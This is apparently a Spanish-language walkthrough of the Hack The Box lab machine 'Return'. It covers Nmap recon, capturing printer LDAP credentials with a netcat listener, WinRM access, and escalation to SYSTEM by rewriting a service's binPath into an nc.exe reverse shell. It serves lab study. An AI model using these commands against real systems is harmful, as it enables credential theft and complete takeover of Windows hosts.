Hacemos reconocimiento basico con Nmap, puertos abiertos y scripts y versiones aplicados en puertos abiertos
//
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-26 15:22 EDT
Nmap scan report for 10.10.11.108
Host is up (0.18s latency).
Not shown: 988 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
nmap -sC -sV -p 53,80,88,135,139,389,445,464,593,636,3268,3269
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: HTB Printer Admin Panel
88/tcp open kerberos-sec?
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-04-26T19:54:32
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Realizamos una exploracion del protocolo SMB para listar recursos compartidos
Observamos que es una impresora, ahora revisemos lo que corre por el puerto 80
nos ponemos en escucha
//
nc -nlvp 389
listening on [any] 389 ...
connect to [10.10.14.38] from (UNKNOWN) [10.10.11.108] 57513
0*`%return\svc-printer�
1edFg43012!!
Obtenemos unas credenciales ahora podresmos probar el ingreso de las mismas por el puerto de SMB o de WINRM que ambos estan abiertos.
//
Intentamos ver si las credenciales son validas
❯ netexec smb 10.10.11.108 -u 'svc-printer' -p '1edFg43012!!'
SMB 10.10.11.108 445 PRINTER [*] Windows 10 / Server 2019 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
SMB 10.10.11.108 445 PRINTER [+] return.local\svc-printer:1edFg43012!!
Probamos con wnrm para ver si es posible la ejecucion remota en windows
❯ netexec winrm 10.10.11.108 -u 'svc-printer' -p '1edFg43012!!'
WINRM 10.10.11.108 5985 PRINTER [*] Windows 10 / Server 2019 Build 17763 (name:PRINTER) (domain:return.local)
WINRM 10.10.11.108 5985 PRINTER [+] return.local\svc-printer:1edFg43012!! (Pwn3d!)
WinRM es Pwnable asi que lo utilizaremos para intentar ganar acceso
//
Utilizamos evil-winrm para probar credenciales
evil-winrm -i 10.10.11.108 -u 'svc-printer' -p '1edFg43012!!'
Evil-WinRM shell v3.7
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-printer\Documents>
Buscamos la FLAG
*Evil-WinRM* PS C:\Users\svc-printer\Documents> cd ..
*Evil-WinRM* PS C:\Users\svc-printer> cd Desktop
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> dir
Directory: C:\Users\svc-printer\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/26/2025 12:34 PM 34 user.txt
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> type user.txt
a36b7a37aef598d3808d8ae5f0b1840b
Ahora intentaremos ir a USERS para observar si podemos escalar privilegios
//
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> cd C:\users
*Evil-WinRM* PS C:\users> dir
Directory: C:\users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/27/2021 4:40 AM Administrator
d-r--- 5/26/2021 1:50 AM Public
d----- 5/26/2021 1:51 AM svc-printer
*Evil-WinRM* PS C:\users> cd Administrator
*Evil-WinRM* PS C:\users\Administrator> dir
Directory: C:\users\Administrator
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 5/20/2021 12:10 PM 3D Objects
d-r--- 5/20/2021 12:10 PM Contacts
d-r--- 9/27/2021 4:22 AM Desktop
d-r--- 5/27/2021 12:50 AM Documents
d-r--- 5/26/2021 3:00 AM Downloads
d-r--- 5/20/2021 12:10 PM Favorites
d-r--- 5/20/2021 12:10 PM Links
d-r--- 5/20/2021 12:10 PM Music
d-r--- 5/20/2021 12:10 PM Pictures
d-r--- 5/20/2021 12:10 PM Saved Games
d-r--- 5/20/2021 12:10 PM Searches
d-r--- 5/20/2021 12:10 PM Videos
*Evil-WinRM* PS C:\users\Administrator> cd Desktop
*Evil-WinRM* PS C:\users\Administrator\Desktop> dir
Directory: C:\users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/26/2025 12:34 PM 34 root.txt
Veo el TXT de la flag pero no me deja abrirla por no tener privilegios asi que tenemos que ganar acceso total al sistema
*Evil-WinRM* PS C:\users\Administrator\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= =================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemtimePrivilege Change the system time Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
*Evil-WinRM* PS C:\users\Administrator\Desktop> net user svc-printer
User name svc-printer
Full Name SVCPrinter
Comment Service Account for Printer
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 5/26/2021 1:15:13 AM
Password expires Never
Password changeable 5/27/2021 1:15:13 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 4/26/2025 1:15:54 PM
Logon hours allowed All
Local Group Memberships
*Print Operators
*Remote Management Use
*Server Operators
*Global Group memberships
*Domain Users
*The command completed successfully.
Server operators esta activado en nuestro nivel de autenticacion lo que nos permitira detener servicios y escalar privilegios así que intentaremos crear una reverse shell subiendo un servicio
para ello ubicaremos nuestro path de NC y pegaremos la dirección absoluta en la maquina victima camuflándolo como un servicio con nc.exe
Ya con el NC en el sistema victima intentamos infectarlo con una reverse Shell simulando ser un servicio existente poniéndome en escucha posteriormente paramos y arrancamos el servicio para entablar la reverse Shell.
//
Modificamos el servicio VMTOOLS con sc.exe para que cuando se ejecute nos permita una reverse shell en nuestro sistema
*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe config VMTools binPath="C:\users\svc-printer\Desktop\nc.exe -e cmd 10.10.14.38 443"
[SC] ChangeServiceConfig SUCCESS
nc -lvnp 443
listening on [any] 443 ...
*Evil-WinRM* PS sc.exe stop VMTools
*Evil-WinRM* PS sc.exe start VMTools
nc -lvnp 443
connect to [10.10.14.38] from (UNKNOWN) [10.10.11.108] 57790
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>type root.txt
25a951805c15e0757260f46fb959f4f9
Accedimos al ROOT y obtuvimos la flag dando por terminada esta maquina.
